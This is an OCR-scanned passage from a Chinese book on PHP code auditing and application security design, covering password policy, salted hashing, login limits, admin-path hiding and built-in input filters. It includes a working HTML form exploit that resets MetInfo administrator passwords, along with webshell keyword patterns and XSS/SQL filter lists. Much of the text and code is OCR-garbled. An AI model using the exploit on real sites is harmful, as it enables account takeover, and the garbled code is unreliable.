
从 乌云 网 的 API 漏 洞 可 以 看 到 目前 API 最 多 的 问题 是 未 授权 访问 以 及 数据 遍历 漏洞 ， 如 果 一 个 接口 随 随 便便 就 可 以 被 调用 ， 在 业务 有 一 定价 值 的 情况 下 ， 相 信和 肯定 会 有 不 少 人 利用 这 个 接口 进行 一 些 不 当 
操作 ， 而 频繁 操作 会 给 服务 器 造成 非常 大 的 资源 消耗 ， 因 此 设计 一 个 安全 的 AP| 应 该 从 以 下 几 点 着 重 考虑 


1) 访问 权限 控制 。 必 要 的 情况 下 加 入 账户 体系 ， 严 格 控制 数据 调用 权限 ， 比 如 当前 用 户 必须 在 登录 情况 下 ， 接 口 参数 中 传 入 自己 登录 成 功 的 凭证 才能 调用 这 个 用 户 的 数据 。 另 外 不 需要 账户 体系 的 情况 
下 也 要 注意 加 入 不 可 暴力 破解 的 访问 密 钥 进行 权限 验证 。 


2) 防止 敏感 信息 泄露 。 之 前 对 知 乎 的 App 进 行 了 抓 包 分 析 ， 其 中 用 户 资料 的 API 就 存在 注册 邮箱 信息 泄露 ， 该 接口 会 返回 当前 查看 的 用 户 资 料 ， 其 中 包括 注册 邮箱 ， 这 样 只 要 知道 某 个 人 的 知 乎 账号 即 
可 知道 他 的 个 人 邮箱 ， 类 似 于 这 种 没 必 要 输出 的 信息 应 该 要 注意 禁止 输出 。 


搜索 关键 字 : 接口 (#1897 条 记录 ) 








好 太夫 在 续 某 接口 犹 洞 可 蜗 历 和 全 站 所 有 用 户 信 息 ..code [区域 httpjWm_haodfcom/iouch/booking/rependpatient?patientla 
查 词 用 户 信息 ..… ... 鉴 可 
提交 日 期 ; 2015-09-02 作者 : AH 





Getshell 
执行 运程 命 仿 .url httpJweb.juhe.cn:8080/environment/air.. 接口 请 检查 dir.D:apache-tomcat-7 .0.52webappsenviroi 
d version Microsoft Windows [fes 5.2.3790] (C) 版 机 所 有 1985-2003 Microsoft Corp. D:apache-tomcat-7.0.52in= 驱 
mcat-7.0.52in 的 目 2015-08-18 12:53 «DIR» . 2015-08-18 12:53 <DIR>... 
提交 日 期 ; 2015-08-31 作者 : HPS 





诈 说 也 是 个 小 米 御 用 快递 吧 。。 能 走 个 大 厂 不 。。… 用 户 注册 的 地 .… 接 口 未 他 限制 ， 可 导致 二 信和 素 炸 。 …… 这 个 好 修 啊 。 
提交 日 期 : 2015-08-29 和 作者: lightless 


[aifend Lm CO) en] BBB Reais BD) 

高 rank rrt beh. aS SS ERR ASS... LIBE: http/temobileapi.17usoft.com/flight/orde 
Sign" : "Ib4d5cf83d3170ef8f7 1efde0610212b", "encryptEffort" : "0", "reqTime" : "1440739092391", "serviceName" : "1 
n«code-tID" : "5ee7b429-b8c6-400f-8b87-3c384c4ea682" ), ... 

提交 日 期 2015-08-28 作者 : 1937nick 


图 11-26 


3) SQL 注入 等 常规 漏洞 。 由 于 传统 扫 摘 器 很 难 抓 取 到 完整 的 接口 和 参数 ， 当 检测 变 得 少 了 ， 漏 洞 自然 就 多 了 ， 所 以 我 们 在 开发 接口 的 时 候 要 特别 注意 代码 安全 ， 注 意 防 止 SQL 注 入 、 代 码 执行 等 漏洞 的 
FE 


第 12 章 ”应 用 安全 体系 建设 


信息 安全 的 防御 遵从 木 桶 原理 ， 这 个 观点 在 安全 界 受到 一 致 认可 ， 所 以 整个 应 用 安全 状态 不 是 由 某 一 个 业务 点 或 者 功能 点 决定 ， 需 要 从 根源 去 解决 安全 问题 。 


我 认为 企业 安全 防御 包含 两 点 : 横向 细 化 策略 和 纵深 策略 。 横 向 细 化 策略 的 精髓 在 于 坚持 能 杀 掉 一 个 是 一 个 的 原则 ， 依 靠 规 则 量 来 填补 空洞 ， 规 则 做 得 越 细 ， 拦 掉 的 攻击 越 多 。 这 是 在 提升 黑客 的 攻击 
成 本 ， 而 缺点 在 于 同样 也 提升 了 防御 成 本 ， 需 要 更 多 的 投入 。 而 纵深 防御 策略 是 假设 上 一 层 防御 策略 失效 而 设计 的 内 网 防御 策略 。 这 两 种 安全 原则 不 仅 仪 用 在 企业 整体 安全 建设 上 ， 更 是 要 细 化 到 每 个 应 用 
设计 上 面 。 


本 章 将 介绍 横向 细 化 策略 和 纵深 策略 的 具体 实施 方法 和 典型 案例 ， 如 给 一 个 后 台 登 录 口 加 上 手机 短信 和 验证， 加 上 验证 码 ， 再 加 上 密码 错误 次 数 限制 等 ， 这 些 手 段 都 是 为 了 防止 暴力 破解 行为 。 而 当 攻 击 
者 通过 其 他 手段 得 到 了 内 网 访问 权限 ， 这 时 候 登 录 还 需要 设置 手机 短信 验证 码 来 验证 登录 权限 等 手段 。 
12.1 用 户 密码 安全 策略 


密码 是 用 户 登 录 非 常 重要 的 验证 凭证 ， 特 别 是 管理 员 账 号 的 密码 安全 更 加 敏感 ， 按 理 来 说 账户 出 现 异常 是 不 能 把 责任 全 推 给 用 户 的 ， 应 用 程序 应 该 在 设计 的 时 候 就 考虑 到 密码 安全 策略 。 针 对 密码 安 
全 ， 笔 者 曾经 在 AWDC (阿里 云 开 发 者 大 会 ) 上 做 过 分 享 ， 笔 者 从 互联 网 收集 到 大 量 泄露 的 网 站 用 户 数据 库 ， 对 这 些 密码 进行 了 分 析 ， 其 中 密码 加 密 情况 如 图 12-1 所 示 。 








BH oci 


从 分 析 中 得 到 ， 泄 露 的 密码 中 有 接近 30% 为 明文 密码 ， 剩 余 70% 多 基本 为 简单 的 MD5 加 密 ， 而 通常 普通 用 户 密码 强度 普遍 不 高 ， 据 笔者 统计 使 用 率 最 高 的 几 个 密码 如 图 12-2 所 示 。 


1234567 


111111 


000000 


5201314 W 


123123 


me en aa MS. 
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所 以 一 旦 某 一 家 网 站 数据 库 港 露 ，M D5 加 密 很 容易 被 破解 ， 会 导致 该 账户 多 个 网 站 的 账户 都 被 登录 ， 港 露 更 多 个 人 信息 。 


为 了 解决 密码 安全 问题 ， 单 从 密码 策略 上 面 来 说 ， 我 们 应 该 遵守 以 下 原则 : 


1) 强制 密码 使 用 8 位 以 上 的 


“大 小 写字 母 + 数字 + 特殊 字符 ”的 组 合 。 


2) 禁止 使 用 123456 以 及 1qaz2wsx 等 弱 口令 。 


3) 禁止 用 户 名 和 密码 相同 ， 


122 ”前 后 台 用 户 分 表 


或 者 存在 较 大 相似 度 。 


9 a11111 
123456 


aini 


= m eo | 


a123456 


前 台 用 户 指 的 是 没有 登入 后 台 权限 的 普通 用 户 ， 这 类 用 户 是 不 需要 操作 后 台数 据 的 ， 而 后 台 用 户 即 管理 员 用 户 ， 有 后 台 登 入 权限 ， 并 且 可 以 在 后 台 对 应 用 进行 配置 ， 从 逻辑 上 来 讲 ， 两 个 不 在 同一 操作 
层面 的 账户 等 级 ， 完 全 不 用 将 账户 放 到 同一 个 数据 库 表 里 面 ， 因 为 当 同 表 的 情况 下 可 能 存在 越权 修改 管理 员 信 息 的 情况 ， 比 如 密码 、 找 回 密码 的 邮箱 等 ， 这 一 类 的 例子 已 经 不 少见 ， 比 如 像 笔 者 2012 年 发 现 
的 metinfo 企 业 管理 系统 的 任意 用 户 密码 修改 漏洞 ， 就 可 以 修改 管理 员 的 密码 ， 


具体 的 漏洞 情况 如 下 。 


Metinfo 系 统 的 会 员 和 管理 员 都 在 met admin table 表 ， 我 们 看 到 membemsave.php 文 件 ， 代 码 如 下 : 











if (Saction--"editor") { 


$query = "update Smet admin table SET 


admin id 

admin name 
admin sex 

admin tel 

admin modify ip 
admin mobile 
admin email 
admin qq 
admin msn 

admin taobao 

admin introduction 
admin modify date 























'Suseid', 
'Srealname', 
'Ssex', 
'Stel', 

'$m user ip', 
'Smobile', 
'Semail', 
"Saq', 

'Smsn', 
'Staobao', 





'$admin introduction', 
'$m now date', 














companyname '$companyname', 
companyaddress '$companyaddress', 
companyfax = 'Scompanyfax', 
companycode = 'Scompanycode', 
companywebsite = '$companywebsite'"; 





if ($pass1) { 
Spassl=md5 (Spass1) ; 
Squery .=", admin pass 
} 





= '$pass1 EMG 


$query .-" where admin id='Suseid'"; 


$db-»query ($query) ; 


Metinfo 系 统 跟 dedecms 一 样 ， 有 一 个 变量 注册 的 机 制 ， 只 要 我 们 在 HTTP 请 求 里 面 提交 一 个 参数 ， 就 会 被 自动 注册 成 变量 ， 


这 段 代码 中 的 SQL 语句 拼接 起 来 大 概 的 意思 如 下 : 





update $met admin table Sl 





ET http://www.hzcourse.com/resource/readi 








Book?path-/openresources/teach ebook/uncompressed/15497/0E 





= 





BPS/Text/...@ http: //www.hzcourse.com/resource/read 





由 于 这 里 的 $useid 变 量 就 是 直接 从 请 求 中 获取 ， 所 以 当 我 们 提交 用 户 ID 为 1， 即 管理 员 用 户 的 时 候 ， 就 可 以 直接 修改 管理 员 密码 ， 利 用 代码 如 下 : 








<form method="POST" name="myform" 

action-"http: //www.xx.com/member/save.php? action-editor" target-" self"» 

«table cellpadding-"2" cellspacing="1" border="0" width-"95$" class="table member"> 
«tr» 

















«td class="member text"><font color="#FF0000">*</font> H) P 4 

&nbsp; </td> 

<td colspan="2" class="member input"> <input name="useid" 
type="text" class="input" size="20" maxlength="20" 

value="seay" ></td> </tr> 

















<tr> 

«td class="member text"><font color="#FF0000">*</font># 8) 
&nbsp; </td> 

«td colspan-"2" class-"member input"» <input name="pass1" 


type="password" class-"input" size="20" 
maxlength="20"></td> 
</tr> 
<td class-"member submit"»«input type="submit" name-"Submit" value="; 242 £" class="submit"></td> 
</tr> 
</form> 











保存 为 以 上 内 容 为 1.html， 用 户 名 输入 框 填写 要 修改 的 用 户 名 (管理 员 基 本 用 户 名 都 是 admin) ， 密 码 填 写成 要 修改 成 的 密码 ， 修 改 代码 中 www.xx.com 为 目标 网 站 域名 ， 提 交 之 后 即 可 修改 该 用 户 密 
码 。 


笔者 当时 测试 了 下 官方 Demo 网 站 ， 成 功 修改 创始 人 密码 ， 并 且 成 功 登入 管理 后 台 ， 如 图 12-3 所 示 ， 该 漏洞 已 经 在 第 一 时 间 提 交 给 官方 修复 。 
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E 12-3 


通过 以 上 例子 可 以 看 出 将 前 后 台 用 户 分 表 存 储 的 必要 性 ， 可 以 很 大 程度 上 防止 账户 体系 上 的 越权 漏洞 。 


12.3 后台 地址 隐藏 


渗透 测试 中 几乎 每 次 都 要 做 的 事情 就 是 对 网 站 目录 进行 枚 举 ， 看 看 有 没有 敏感 文件 和 后 台地 址 泄露 ， 这 类 工具 有 很 多 ， 其 中 御 剑 就 是 用 户 量 非常 大 的 一 款 工具 ， 只 要 在 作业 列表 栏 里 面 点 击 添 加 按钮 ， 
输入 HTTP 访 问 地 址 之 后 ， 再 点 击 “ 开 始 扫 描 ” 即 可 对 网 站 进行 目录 探测 ， 如 图 12-4 所 示 。 


E EE 3 ee (eee = (ae 
Buu txt 一 口 ] 用 


http: wee ccs om/user | 
http://www. qq- agent renee 
http://www. qq. com/public 
http://www. qq. com/bbs 


http://www. qq. com/uzr 


http://www. qq. aom/ ww 


http://www. qq. com/certificate 
http://www. qq. com/apps 


em |[ we [RE || | | 
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一 旦 发 现 后 台地 址 ， 就 会 对 后 台 进 行 暴力 破解 等 操作 ， 甚 至 会 利用 社会 工程 学 的 方式 想方设法 拿 到 管理 员 的 密码 ， 相 对 而 言 ， 如 果 我 们 连 后 台地 址 都 不 让 攻击 者 找到 ， 那 这 些 攻击 手段 就 用 不 上 ， 所 
LA, 后台 目录 不 能 固定 ， 应 该 由 用 户 登录 后 台 页 面 后 自 定义 设置 ， 或 者 直接 修改 后 台 文 件 夹 即 可 ， 为 了 提高 安全 性 ， 还 应 该 在 安装 完成 后 立刻 提醒 管理 员 修 改 后 台地 址 ， 比 如 DedeCMS 就 一 直 在 后 台 主 页 
标 红 显 示 ， 如 图 12-5 所 示 。 
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图 12-5 





12.4 ”密码 加 密 人 存储 方式 


从 各 大 社工 库 交 易 论坛 来 看 ， 目 前 每 天 都 有 不 少 网 站 被 拖 库 ， 其 中 不 乏 行 业 影响 力 排行 靠 前 的 企业 网 站 ， 总 计 公 开 的 数据 库 达 十 亿 条 以 上 ， 如 图 12-6 和 图 12-7 所 示 。 


版 块 主题 Q 
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版 块 主题 (2 


(=) CSDN- 中 YIT 社 区 -600 万 £e ...2 3456..8 
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图 12-7 


密码 安全 的 存储 成 为 了 保障 用 户 信息 安全 首要 关注 的 事情 ， 据 笔者 的 统计 分 析 ， 泄 露 的 数据 有 30% 未 加 密 ，60% 以 上 采用 的 MD5 和 sha1 类 型 的 哈 希 算法 存储 ， 由 于 普通 用 户 的 密码 普遍 不 会 很 复杂 ， 保 
守 估 计 90% 以 上 的 用 户 密码 可 以 轻松 被 解密 ， 有 多 家 网 站 专门 提供 密码 破解 的 服务 ， 像 cmd5.com、xmd5.org 等 ， 其 中 cmd5.com 更 是 号 称 破解 成 功率 高 达 95% ， 既 然 用 户 自己 不 会 设置 高 强度 的 密码 ， 那 
服务 方 应 该 想 办 法 解决 这 个 问题 ， 一 是 采用 高 强度 安全 环境 保存 ， 数 据 仍然 是 普通 MD5 等 算法 保存 ， 不 过 谁 也 无 法 保证 100% 安 全 ， 这 种 做 法 看 起 来 有 鸡肋 的 感觉， 另外 一 种 做 法 就 是 为 密码 加 一 个 极其 复 
杂 的 固定 字符 串 ， 再 进行 MD5 或 者 sha1 算 法 进行 保存 ， 这 样 通过 枚 举 的 方式 就 很 难 解密 ， 举 一 个 例子 ， 代 码 如 下 : 


«? 


phi 
Spassword=$ POST['password']; 





Ssafestr = "012345678 9abcdefghijklmnopgrstuvwxyz~! GFsS^sg* () [Ig % 


Sal 











} 


S alt=""; 
for ($i=0 ; Si<6; $i++) 


$salt .= Ssafestr[rand (0, 54) ]; 





Spassword=md5 (md5 (Spassword.'*5t42g^ ^SSFFSD') .$salt) ; 
echo $password; ? » 








将 生成 的 salt 存 入 数据 库 中 ， 后 期 验证 过 程 中 将 salt 取 出 重新 用 MD5 运 算 一 下 ， 对 比 结果 即 可 知道 密码 是 否 正确 。 


12.5 


登录 限制 


基于 纵深 防御 的 思想 ， 假 设 前 面 所 说 的 后 台地 址 已 经 泄露 ， 假 设 密码 被 社会 工程 学 等 方式 窃取 到 ， 这 种 情况 下 我 们 就 要 考虑 在 登录 这 一 层 设置 障碍 ， 即 使 攻击 者 拿 到 密码 也 无 法 登录 ， 想 实现 这 一 效果 
该 怎么 做 呢 ， 是 做 信誉 体系 ? 自动 识别 好 人 和 坏人 ? 这 种 方式 很 有 效果 ， 但 是 实现 起 来 太 庞大 ， 一 般 的 公司 没有 这 样 的 数据 基础 去 做 件 事 ， 所 以 用 代码 来 简单 实现 最 简单 的 策略 如 下 所 示 。 


1) 


2) 


限制 登录 IP。 只 能 固定 |P 访 问 ， 或 者 说 公司 内 网 访问 ， 在 外 网 需要 访问 的 时 候 拨 VPN 即 可 。 


双 因 素 认 证 。 限 制 内 网 IP 是 相对 安全 的 ， 但 是 还 不 够 安全 ， 因 为 攻击 者 有 很 大 的 可 能 已 经 通过 其 他 途径 进入 到 内 网 ， 所 以 就 需要 用 到 双 因 素 认证 手段 ， 比 如 手机 验证 码 、 动 态 令 牌 都 是 非常 有 效 的 方 


式 ， 我 们 在 渗透 测试 的 时 候 经 常 遇 到 这 种 情况 : 拿 到 密码 之 后 要 双 因 素 认证 才能 登录 。 


12.6 API 站 库 分 离 


在 很 久 以 前 就 有 不 少 网 站 使 用 站 库 分 离 这 种 方式 ， 不 过 实现 的 方式 不 一 样 ， 大 多 数 的 站 库 分 离 只 不 过 是 把 数据 库 放 到 另外 一 台 服 务 器 上 ， 然 后 开放 数据 库 端口 给 Web 服 务 器 ，Web 应 用 直接 通过 数据 库 
密码 操作 数据 ， 这 样 的 方式 只 能 优化 服务 器 的 效率 ， 对 于 安全 性 的 提高 并 没有 什么 帮助 ， 笔 者 这 里 说 的 站 库 分 离 是 采用 API 的 方式 调用 数据 ， 大 概 的 原理 如 图 12-8 所 示 。 


APIO 





数据 库 服务 器 








图 12-8 


如 果 业 务 比较 复杂 ， 可 以 单独 跑 一 台 API 服 务 器 ， 数 据 库 服务 器 配置 只 允许 API 服 务 器 访问 ,流程 如 图 12-9 所 示 。 


API 接 口 
WebHE 5€ 2$ 





数据 库 服务 器 





图 12-9 


通过 API 实 现 站 库 分 离 的 好 处 在 于 ， 攻 击 者 即使 拿 到 了 Web 服 务 器 ， 也 无 法 在 短 时 间 内 将 全 部 数据 拖 走 ， 只 要 我 们 建立 API 接 口 监 控 ， 设 置 一 个 靖 值 ， 遇 到 监控 接口 突然 被 频繁 调用 的 情况 ， 则 说 明 可 能 
存在 刷 库 行 为 ， 这 也 起 到 一 种 入 侵 检测 的 作用 ， 当 然 这 一 切 的 前 提 是 API 服 务 器 的 安全 要 做 好 。 


12.7，” 慎 用 第 三 方 服务 


第 三 方 服务 的 分 类 有 很 多 ， 这 里 说 的 第 三 方 服务 指 的 是 第 三 方 开放 给 Web 应 用 的 接口 ， 或 者 JS 等 ，CNZZ、 百 度 统计 以 及 广告 等 ， 就 是 非常 典型 的 第 三 方 服务 ， 展 现形 式 多 种 多 样 ， 如 图 12-10 所 示 。 





E 1240 


如 图 12-11 所 示 为 CNZZ 用 户 数据 分 析 ， 可 以 精确 地 统计 访客 的 性 别 、 年 龄 、 职 业 ， 等 等 。 


性 别 分 布 男性 访客 更 偏爱 您 的 网 站 : 年 龄 公布 事业 上 升 期 的 青年 居多 


Hitt 


1.14% 31.84% 34.12% 35.18% 6.78% 6.86% 4.08% 











对 本 网 站 的 专注 度 @ 网 民 类 型 分 析 © 拥有 较 多 普通 网 民 


By, HARXEXE: 4.54% ESL 


E 1241 





广告 商 通常 都 是 事先 收集 用 户 访问 过 的 网 站 ， 然 后 精准 定向 推送 广告 ， 这 就 需要 一 张大 网 ， 才 能 收集 到 访客 的 信息 ， 比 如 使 用 CNZZ， 需 要 在 网 站 上 插入 一 段 Js 代码 ， 大 致 如 下 所 示 : 





«script src-"http: //s85.cnzz.com/stat.php? id-4318211&web id-4318211&show-pic" language="JavaScript"></script> 


这 段 短小 的 代码 会 生成 一 段 长 长 的 Js， 而 一 旦 用 户 访问 了 我 们 的 网 站 ， 用 户 的 浏览 器 就 会 执行 这 段 JS，JSs 可 以 做 的 事情 很 多 ， 挂 马 、 钓 鱼 、 盗 取 cookie， 甚 至 制造 蠕虫 病毒 和 发 起 DDOS 攻 击 ， 一 旦 攻 


击 者 入 侵 CNZZ 和 广告 商 这 些 第 三 方 服务 之 后 ， 


12.8 ”严格 的 权限 控制 


用 户 权 限 控制 涉及 一 个 角色 功能 的 问题 ， 


管理 员 、 评论 反馈 管理 


| | 商品 管理 





[ 订单 管理 


细 化 权限 也 是 安全 体系 中 非常 重要 的 一 环 ， 


12.9 ”敏感 操作 多 因素 验证 


多 因素 验证 在 很 多 操作 中 都 适用 ， 
做 得 非 党 好， 如 图 12-13 所 示 。 
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特别 是 敏感 的 操作 ， 从 业务 逻辑 上 来 说 ， 不 仅仅 是 


一 种 角色 可 以 有 多 个 用 户 ， 比 如 一 个 商城 系统 的 角色 可 以 分 为 : 超级 
， 等 等 ， 如 图 12-12 所 示 是 ECShop 后 台 角 色 配 置 页 面 ， 权 限 的 控制 划分 得 非常 细 。 


mee | | 


往往 职位 不 高 的 人 安全 意识 会 比较 注 弱 ， 密 码 可 能 会 设置 得 相对 简单 ， 给 他 较 低 的 权限 ， 


台 的 登录 、 修 改 配置 等 操作 才 算 敏感 ， 同 样 前 台 用 


就 可 以 间接 入 侵 使 用 了 这 些 服务 的 网 站 ， 危 害 非常 大 。 如 果 一 定 要 使 用 ， 建 议 选 择 权 威 一 点 的 服务 提供 商 。 
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BE -rten 
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| | ee 


就 可 以 限制 他 的 操作 行为 ， 从 而 提高 安全 性 。 


个 人 操作 的 时 候 也 一 样 需要 受到 保护 ， 阿 里 云 在 这 方面 
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证 得，60 秒 后 可 以 重新 发 送 。 


验证 公 :| 输入 6 位 验证 码 





图 12-13 
在 阿里 去 进行 诸如 修改 域名 解析 、 修 改 服务 器 密码 等 操作 时 都 需要 验证 手机 短信 ， 这 样 即使 密码 被 泄露 也 无 法 进行 这 些 敏 感 操作 。 
多 因素 认证 从 字面 意思 就 可 以 理解 ， 即 添加 多 种 验证 方式 ， 敏 感 操作 多 次 验证 权限 ， 验 证 的 方式 有 如 下 几 种 : 
1) 手机 短信 验证 码 。 
2) 手机 语言 验证 码 。 
3) 手机 App 动 态 令 牌 。 
4) 邮箱 验证 码 。 
5) 实体 令 牌 卡 。 
6) 电子 图 片 令 牌 卡 。 
7) 硬件 令 牌 。 


验证 方式 层出不穷 ,我 们 在 使 用 的 时 候 需 要 根据 业务 的 保密 程度 来 确定 使 用 哪 种 方式 ， 因 为 每 种 方式 的 用 户 体 验 不 同 ， 像 某 银行 开发 的 U 盾 使 用 的 时 候 必 须要 用 IE 浏 览 器 ， 然 后 安装 各 种 驱动 ， 折 腾 半 天 
还 要 重启 一 下 ， 最 后 发 现 还 不 一 定 能 用 ， 这 种 体验 非常 糟糕 。 


1210 ”应 用 上 自身 的 安全 中 心 


虽然 现在 基于 主机 WAF、 云 WAF 随 随便 便 都 能 列 出 一 大 堆 ， 但 是 毕竟 这 些 防 御 方 案 都 不 是 定制 化 的 ， 因 为 无 法 结合 应 用 代码 逻辑 ， 所 以 无 法 很 好 地 防御 攻击 和 满足 需求 ， 而 应 用 代码 层 的 防御 则 可 以 大 
大 利用 白 名 单 的 优势 ， 比 如 已 经 知道 某 个 参数 一 定 是 INT 类 型 ， 就 可 以 在 使 用 这 个 参数 时 将 其 转 为 INT 类 型 ， 或 者 判断 是 否 为 数字 ， 如 果 不 是 则 将 请 求 驳 回 ， 这 些 优势 是 其 他 层面 的 WAF 无 法 取代 的 ， 因 此 应 
用 自身 的 安全 防御 功能 必 不 可 少 。 


目前 开源 应 用 几乎 都 有 自身 的 防御 措施 ， 比 如 phpcmsv9， 其 代码 如 下 : 


class param { 
// 路 由 配置 
private $route config = ''; 
public function construct O { 
if (! get magic quotes gpc () ) { 
$ POST - new addslashes ($ POST) ; 
$ GET = new addslashes ($ GET) ; 
$ REQUEST = new addslashes ($ REQUEST) ; 
$ COOKIE = new addslashes ($ COOKIE) ; 









































在 参数 传 入 时 会 对 $ GET/$ POST/$ COOKIE 和 $_REQUEST 变 量 进 行 转 义 ， 然 后 在 数据 库 操作 时 又 会 进行 过 滤 ， 代 码 如 下 : 





* 安全 过 滤 函 数 


* @param Sstring 












































* @return string 

= 

function safe replace ($string) { 
$string = str replace ('$20', '', $string) ; 
$string = str replace ('$27', '', $string) ; 
Sstring = str replace ('82527', ''", $string) ; 
$string = str replace ('*', '', $string) ; 
$string = str replace ('"', '&quot; ', $string) ; 
$string = str replace ("'", '', $string) ; 
































$string = str replace ('"', '', $string) ; 
Sstring = str replace ('; ', '', $string) ; 
$string = str replace ('«', '&lt; ', $string) ; 
$string = str replace ('>', '&gt; ', $string) ; 
$string = str replace ("{", '', $string) ; 
$string = str replace ('}', '', $string) ; 
$string = str replace ('\\', '', $string) ; 
return $string; 





/** 


* xssid jk 
* 


* @param Sstring 
* @return string 
*/ 
function remove xss ($string) { 
$string = preg replace ('/[\x00-\x08\x0B\x0C\x0E-\x1F\x7F]+/S', '', $string) ; 
Sparml = Array ('javascript', e id 'expression', 'applet', 'meta', "'xml', 'blink', 'link', 'script', 'embed', 'object', ''iframe', 'frame', 'frameset', 'ilé 
Sparm2 = Array ('onabort',  'onactivate' 'onafterprint', ''onafterupdate',  'onbeforeactivate',  'onbeforecopy', 'onbeforecut',  'onbeforedeactivate',  'onbeforeeditfocus' 
$parm = array merge (Sparml, Sparm2) ; 
for ($i = 0; Si < sizeof ($parm) ; Sic) { 
Spattern = '/'; 
tor “($j = 0; $j < strlen ($parm[$i]) ; $j++) { 
if ($j 0) { 
1 


















































$pattern . 
$pattern . 
$pattern . 
$pattern . 











} 


} 
$pattern .= '/i'; 
$string = preg replace ($pattern, ' ', $string) ; 











$pattern .= $parm[$i][$j]; 


return $string; 
pm 
* 对 字段 两 边 加 反 引 号 ， 以 保证 数据 库 安全 
* @param $value 数组 值 
public function add special char (&$value) { 
if ('*' == $value || false ! == strpos ($value, ' (') || false ! == strpos ($value, '.') || false ! == strpos ( $value, "'^')) { 
// 不 处 理 包 含 * 或 者 使 用 了 SQL 方法 。 








) else ( 
Svalue = '^'.trim ($value) .'^' 
} 
if (preg match ("/\b (select |insert|update|delete) \b/i", $value) ) { 
$value = preg replace ("/\b (select | insert |update|delete) \b/i", '', $value) ; 








return Svalue; 
以 上 代码 分 别 是 phpcmsv9 的 SQL 注 入 防御 以 及 XSS 防 御 代码 。 甚 至 有 的 应 用 还 有 自己 的 安全 中 心 ， 如 dedecms， 提 供 类 似 WebShell 查 杀 的 功能 ， 如 图 12-14 所 示 。 
用 户 安全 中 心 


安全 建议 : 

、 有 人 条件 的 用 户 把 中 data, templets. uploads, html. special. images. instal l ARRESTATA ITEE. B 
2、 本 检测 程 以 开 农 模式 为 标准 ， 如 果 您 的 网 站 目录 包含 其 它 系 统 ， 此 检测 程序 可 能 会 产生 错误 判断 ; 
3. Ts AE FOE tessa RAS: ATRE. HIT Rew AT ewes 


文件 类 型 [mele O | 要 检查 的 文件 类 型 


代码 特征 : | eval |cmd|systemlexec| GET| POST | 特征 代码 


THE" ATRIA | 


检测 结果 : GRRASS: gps EDIT SERERE) 


可 疑 文 件 : /include/baidusitemap. func. php 

BIER E: /include/filter. inc. php bid ESSE, 
OJE}: /include/helpers/changyan. helper. php [Hg] E: 

可 疑 文件 : /member/buy_action. php [Mg] [查看 源码 ] 
BSE (+: /plus/baidusitemap. php ME] ESR 


E 12-14 





一 个 网 站 的 应 用 安全 防御 应 该 包括 对 输入 的 特殊 字符 过 滤 、 输 出 过 滤 、 异 常 访问 检测 、 自 身 安全 检测 ， 等 等 。 其 中 ， 自 身 安全 检测 方式 有 : 木马 查 杀 、 弱 后 台地 址 检测 、 弱 口令 检测 ， 等 等 。 


在 学 习 代 码 审计 过 程 中 ， 我 们 需要 不 断 接触 更 多 的 实例 ， 所 以 笔者 收集 了 一 些 不 错 的 有 代码 审计 内 容 的 网 站 为 大 家 推荐 一 下 。 
Www.Wooyun.org| 乌 云 网 


乌云 网 是 目前 国内 最 大 的 漏洞 平台 ， 将 白 帽 子 跟 三 商 联系 起 来 ， 在 对 安全 问题 进行 反馈 处 理 跟 进 的 同时 ， 为 互联 网 安全 研究 者 提供 一 个 公益 、 学 习 、 
在 乌云 网 上 提交 ， 是 一 个 非常 适合 漏洞 挖掘 学 习 的 平台 。 


交流 和 研究 的 平台 ， 每 天 都 有 大 量 的 开源 程序 漏洞 
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草 政 府 在 用 系统 通用 型 sq 
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Seay 网 络 安全 博客 是 笔者 维护 的 一 个 个 人 博客 ， 主 要 包括 渗透 测试 ， 代 码 审 计 ， 软 件 编程 ， 安 全 运 维 以 及 创业 相关 文章 ， 其 中 最 核心 的 内 容 为 代码 审计 方面 ， 包 含 大 量 漏洞 挖掘 和 分 析 实 例 。 
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www.0day5.com| 漏 洞 时 代 


漏洞 时 代 网 主要 发 布 ASP、ASP.NET、PHP、JSP、CGI、Windows、Linux/Unix 等 多 方面 漏洞 ， 由 民间 组 织 建立 。 
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Discuz! 后 台 种 getshell ( 第 三 方 安全 间 题 ) 


Discuzl 后 台 种 getshell( 第 三 广安 全 问题 ) 


www.leavesongs.com| 离 别 歌 


离别 歌 是 phithon 的 个 人 博客 ， 博 主 经 常 在 其 博客 发 布 非常 有 意思 的 代码 审计 漏洞 研究 ， 对 于 新 手 学 习 代 码 审计 也 是 一 个 不 错 的 去 处 。 
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高 级 PHP 应 用 程序 漏洞 审核 技术 


高 级 PHP 应 用 程序 漏洞 审核 技术 是 一 份 放 在 google 的 PHP 安 全 文档 ， 地 址 为 https://code.google.com/p/pasc2at/wiki/SimplifiedChinese， 介 绍 的 是 代码 审计 的 方法 ， 推 荐 阅读 。 
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